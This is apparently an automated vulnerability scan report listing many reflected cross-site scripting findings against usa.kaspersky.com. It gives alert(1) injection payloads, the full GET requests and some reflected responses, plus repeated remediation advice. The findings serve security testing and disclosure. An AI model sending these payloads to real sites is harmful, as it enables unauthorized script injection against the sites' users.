The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0fa3"-alert(1)-"d3bc9293f2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c98"><script>alert(1)</script>740b9641b5a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7f5"-alert(1)-"49acdc67907 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f5c2"-alert(1)-"ee985bf493c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67846"><script>alert(1)</script>be65bc9e9b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f93"-alert(1)-"88344e1a75c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92f7"><script>alert(1)</script>e64a1e12636 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0fce"-alert(1)-"d5f511604d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c39c"><script>alert(1)</script>b20d160fad6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abf7"-alert(1)-"9b7583af2f7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95dba"><script>alert(1)</script>e48d751b1d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d226"-alert(1)-"5cbfac5401b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites7d226"-alert(1)-"5cbfac5401b/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d2ac"><script>alert(1)</script>6aad20417ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites5d2ac"><script>alert(1)</script>6aad20417ca/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 815b2"><script>alert(1)</script>37f0e3b07ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/usa.kaspersky.com815b2"><script>alert(1)</script>37f0e3b07ae/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb994"-alert(1)-"9771fba1a77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/usa.kaspersky.comcb994"-alert(1)-"9771fba1a77/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fd41"-alert(1)-"4857cb508a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/usa.kaspersky.com/files6fd41"-alert(1)-"4857cb508a7/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52d43"><script>alert(1)</script>2e4b5f14ad6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/usa.kaspersky.com/files52d43"><script>alert(1)</script>2e4b5f14ad6/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb19"><script>alert(1)</script>6efbe913e54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/usa.kaspersky.com/files/ctoolsdcb19"><script>alert(1)</script>6efbe913e54/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b23a"-alert(1)-"622df54d13d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/usa.kaspersky.com/files/ctools4b23a"-alert(1)-"622df54d13d/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69f5d"><script>alert(1)</script>811dc359d64 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/usa.kaspersky.com/files/ctools/css69f5d"><script>alert(1)</script>811dc359d64/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 769eb"-alert(1)-"a9e76941f9f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/usa.kaspersky.com/files/ctools/css769eb"-alert(1)-"a9e76941f9f/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4e17"><script>alert(1)</script>267d3d6753e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssc4e17"><script>alert(1)</script>267d3d6753e?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0526"-alert(1)-"1eb0bf43450 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssc0526"-alert(1)-"1eb0bf43450?R HTTP/1.1 Host: usa.kaspersky.com Proxy-Connection: keep-alive Referer: http://usa.kaspersky.com/?domain=kapersky.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a7f7"-alert(1)-"2f806a7d1f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c50b"><script>alert(1)</script>3e346afd99a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1c44"-alert(1)-"37a9394198f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4525b"><script>alert(1)</script>9a663ec799f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c23b"-alert(1)-"10b2e9cbe39 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc41"><script>alert(1)</script>e87ad2737ca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86da1"-alert(1)-"46ad7e8ba57 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef39"><script>alert(1)</script>823d4acb16c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a3de"-alert(1)-"0ee1a331aeb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae0a"><script>alert(1)</script>bf723308b25 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fd35"-alert(1)-"dcc2d772d0d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93a5a"-alert(1)-"05956d8a4dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53d42"><script>alert(1)</script>5b132f4cd0b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2741c"-alert(1)-"a6f7a31d0f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1723a"><script>alert(1)</script>ee20143fcdf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df53f"><script>alert(1)</script>f69aee4597f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/usa.kaspersky.com/files/js_injector_28.jsdf53f"><script>alert(1)</script>f69aee4597f HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Cache-Control: public, max-age=21600 Last-Modified: Sun, 04 Sep 2011 14:04:33 +0000 Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie ETag: "1315145073" Content-Type: text/html; charset=utf-8 Content-Length: 32422 Date: Sun, 04 Sep 2011 14:04:40 GMT X-Varnish: 1163242244 Age: 0 Via: 1.1 varnish Connection: close X-Varnish-Cache: MISS
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_28.jsdf53f"><script>alert(1)</script>f69aee4597f" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 995ee"-alert(1)-"4c55e7351ad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/usa.kaspersky.com/files/js_injector_28.js995ee"-alert(1)-"4c55e7351ad HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Cache-Control: public, max-age=21600 Last-Modified: Sun, 04 Sep 2011 14:05:14 +0000 Expires: Sun, 11 Mar 1984 12:00:00 GMT Vary: Cookie ETag: "1315145114" Content-Type: text/html; charset=utf-8 Content-Length: 36855 Date: Sun, 04 Sep 2011 14:05:20 GMT X-Varnish: 1163243798 Age: 0 Via: 1.1 varnish Connection: close X-Varnish-Cache: MISS
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12019"-alert(1)-"cc53a18bcad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store12019"-alert(1)-"cc53a18bcad/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c3d"><script>alert(1)</script>728d01007db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /store61c3d"><script>alert(1)</script>728d01007db/index.html HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1823e"-alert(1)-"c57b3ddd40c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store/index.html1823e"-alert(1)-"c57b3ddd40c HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a44b"><script>alert(1)</script>45b650893da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /store/index.html2a44b"><script>alert(1)</script>45b650893da HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/store/index.html2a44b"><script>alert(1)</script>45b650893da" /> ...[SNIP]...
1.241. http://usa.kaspersky.com/store/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/store/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78669"><script>alert(1)</script>5799514c24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /store/index.html?78669"><script>alert(1)</script>5799514c24=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht ...[SNIP]... <link rel="canonical" href="http://usa.kaspersky.com/store/index.html?78669"><script>alert(1)</script>5799514c24=1" /> ...[SNIP]...
1.242. http://usa.kaspersky.com/store/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://usa.kaspersky.com
Path:
/store/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 851c8"-alert(1)-"81aae218061 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store/index.html?851c8"-alert(1)-"81aae218061=1 HTTP/1.1 Host: usa.kaspersky.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close